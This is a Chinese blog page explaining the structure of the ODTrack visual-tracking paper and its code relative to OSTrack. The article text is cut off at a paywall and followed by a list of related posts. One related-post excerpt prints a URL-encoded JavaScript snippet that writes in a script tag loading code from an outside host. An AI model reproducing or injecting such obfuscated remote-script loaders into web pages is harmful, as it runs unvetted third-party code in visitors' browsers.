ODTrack: Online Dense Temporal Token Learning for Visual Tracking论文及代码结构解读

Soonki

已于 2024-07-13 16:33:47 修改

阅读量1.4k

点赞数 14

分类专栏： OT论文解读文章标签：深度学习人工智能目标跟踪 transformer

于 2024-07-12 21:56:23 首次发布

本文链接：https://blog.youkuaiyun.com/Soonki/article/details/140388513

版权

论文地址
代码地址

写在最前面

作者采用了One-Stream的框架，pipeline用的是OSTrack的，两者基本相同。
区别在于：

使用了3张Template构建Template_list与一张Search构建融合特征
使用了2张Search，每张分别进行一次上述过程
在Test和Eval中，保存历史预测Box，并根据这个Box裁剪出相应的历史Template，便于后续帧序列的Template采样3张

存在的问题

search和template图像对之间的采样是稀疏的，不足以充分表达目标的动态变化
在test和eval中，search和template之间的匹配是离线的(就是template或者search没有更新)，这阻碍了其中互信息的表达

解决方案

在这里插入图片描述

使用token sequence propagation paradigm(这里的说法让人困惑，操作是在ViT的第3、6、9层block中，把注意力的嵌入向量进行最大值筛选，把这个筛选的标准

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Soonki

关注关注

14
点赞
踩
24

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

ODTrack: Online Dense Temporal Token Learning for Visual Track

07-12

ODTrack: Online Dense Temporal Token Learning for Visual Tracking论文及代码结构

【CVPR2022】论文列表与下载——PartTwo

TomRen

06-12

2603

CVPR2022完整论文列表

参与评论您还未登录，请先登录后发表或查看评论

目标跟踪算法个人理解-ODTrack篇

nulishuaxinzhong的博客

02-12

4559

AAAI2024中稿文章，连续视频帧之间的在线上下文推理和关联对于视觉跟踪中的实例感知至关重要。然而，目前大多数表现最好的跟踪器通过离线模式持续依赖于参考帧和搜索帧之间的稀疏时间关系。因此，它们只能在每个图像对内独立地进行交互，并建立有限的时间相关性。为了缓解上述问题，提出了一种简单、灵活和有效的视频级跟踪管道，命名为ODTrack，它以在线令牌传播的方式（online token propagation manner）密集关联视频帧的上下文关系。

ODTrack论文阅读笔记

qq_54674961的博客

12-02

1690

连续视频帧之间的在线上下文推理和关联对于视觉跟踪中的实例感知至关重要。然而，目前大多数表现最好的跟踪器通过离线模式持续依赖于参考帧和搜索帧之间的稀疏时间关系。

AAAI 2024 | 广西师范大学提出ODTrack：目标跟踪新框架

阿木寺的博客

06-02

600

点击下方卡片，关注“CVer”公众号AI/CV重磅干货，第一时间送达点击进入—>【目标跟踪和Mamba】交流群添加微信：CVer5555，小助手会拉你进群！扫描下方二维码，加入CVer学术星球！可以获得最新顶会/顶刊上的论文idea和CV从入门到精通资料，及最前沿应用！发论文/搞科研/涨薪，强烈推荐！ODTrack: Online Dense Temporal Token Learning ...

OD使用经验

zacklin的专栏

07-12

7396

1.我的os是winXP,无法使用trw2000,而softice装了多次均未成功,还蓝屏死机多次.郁闷. 2.友好的gui界面,不像softice.可以边干活边听歌,不像softice,把整个os都挂起了.多用两次,连时间都不知道了. 3.强大的内存查看功能,再不用什么-d了,而且跳转方便,爽!一目了然. 4.强大的右键菜单功能菜单: 文件: 1.其中包括该菜单的下部

【AI视野·今日CV 计算机视觉论文速览第283期】Thu, 4 Jan 2024

TomRen

01-07

1897

AI视野·今日CS.CV 计算机视觉论文速览 Thu, 4 Jan 2024 Totally 85 papers 👉上期速览✈更多精彩请移步主页 Daily Computer Vision Papers LEAP-VO: Long-term Effective Any Point Tracking for Visual Odometry Authors Weirong Chen, Le Chen, Rui Wang, Marc Pollefeys视觉里程计根据视觉输入估计移动摄像机的运动。现有

OSTrack的一些代码执行命令讲解

南城以北的博客

04-18

3277

执行如下命令可以生成路径文件，分别会在OSTrack/lib/train/admin目录和OSTrack/lib/test/evaluation目录下生成local.py文件，里面是各种路径的默认设置。配置文件为OSTrack/experiments/ostrack/vitb_256_mae_ce_32x4_ep300.yaml。一些单目标跟踪算法的代码执行命令非常相似，例如Stark、OSTrack、CSWinTT、AiATrack等，因此对一些命令进行讲解，有助于提升代码研究效率。

概念学习（Concept Learning）

aws10686的博客

05-06

3994

从特殊的训练样例中归纳出一般函数是机器学习的核心问题。一般函数是对理想目标函数的函数逼近（function approximation）。简而言之，从特殊到普通。与此对应的是演绎推理（deductive reasoning），就是从一般性的前提出发，通过推导（即“演绎”），得到具体的称述或个别结论的过程（可以看作预测过程，根据一般规律得出结论）。归纳学习假设：任一假设如果在足够大...

MediaStream，AudioTrack，VideoTrack的关系

奔向火星的博客

05-23

5388

在webrtc中，MediaStream代表一个媒体流，AudioTrack，VideoTrack代表音频”轨道”和视频“轨道”，如同一个MP4文件可以包含许多音轨和视频轨一样，一个MediaStream中可以包含多个AudioTrack和VideoTrack，它们的关系如下图：

关于OD的经

09-27

609

HTML Tags and JavaScript tutorialvar encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);

深度学习篇---网络结构

2301_79556402的博客

04-01

1360

本文简单介绍了，Pytorch框架下的一款深度学习网络框架的配置。

深度学习处理文本（9）

yyc的博客

04-03

1183

比如在机器翻译中，查询是目标序列，键和值则都是源序列：对于目标序列中的每个元素（如“tiempo”），你都希望回到源序列（“How’s the weather today?当然，如果你只做序列分类，那么查询、键和值这三者是相同的：将一个序列与自身进行对比，用整个序列的上下文来丰富每个词元的表示。“多头”是指：自注意力层的输出空间被分解为一组独立的子空间，对这些子空间分别进行学习，也就是说，初始的查询、键和值分别通过3组独立的密集投影，生成3个独立的向量。搜索引擎会将你的查询和数据库中的键进行对比。

AF3 OpenFoldDataLoader类_prep_batch_properties_probs方法解读

最新发布

qq_27390023的博客

04-06

478

AlphaFold3 data_modules 模块的 OpenFoldDataLoader 类的 _prep_batch_properties_probs 方法是为每个批次数据准备 recycling 维度的概率分布。它将根据配置文件中的设定为每个批次数据生成 recycling 轮次的概率分布，并存储到 prop_probs_tensor 中，用于后续抽样选择特定recycling维度的数据（ _add_batch_properties方法中实现）。

深度学习之微调

weixin_73557167的博客

04-04

701

微调

【算法岗面试题】深度学习中如何防止过拟合？

qq_61907825的博客

04-01

868

这是个深度学习中比较常见的问题。

【动手学深度学习】卷积神经网络（CNN）入门

qq_46370017的博客

04-05

848

CNN通过局部特征提取+层级抽象的原理，将复杂任务（如图像分类）转化为可学习的数学问题。其应用从早期的手写识别发展到今天的自动驾驶、医疗诊断等关键领域，核心优势在于自动特征学习和对空间/时序数据的高效处理，成为深度学习最成功的模型之一。

从代码学习深度学习 - LSTM PyTorch版

weixin_43887510的博客

04-04

1190

深度学习中的循环神经网络（RNN）及其变种长短期记忆网络（LSTM）在处理序列数据（如文本、时间序列等）方面表现出色。本篇博客将通过一个完整的PyTorch实现，带你从零开始学习如何使用LSTM进行文本生成任务。我们将基于H.G. Wells的《时间机器》数据集，逐步展示数据预处理、模型定义、训练与预测的全过程。通过代码和文字的结合，帮助你深入理解LSTM的实现细节及其在自然语言处理中的应用。数据加载与预处理（LSTM模型定义（Jupyter Notebook中的模型部分）训练与预测逻辑（

深度学习篇---模型训练（1）

2301_79556402的博客

04-05

549

本文再网络结构（1）的基础上，完善数据读取、数据增强、数据处理、模型训练、断点训练等功能。

dense contrastive learning for self-supervised visual pre-training

04-06

“密集对比学习自监督视觉预训练”是一种自监督学习方法，旨在通过对比度训练来提高视觉表征学习的效果。该方法通过训练网络来学习将相似的图片特征映射到一起，将不同的图片特征区分开来，从而使网络获得更好的视觉表征能力。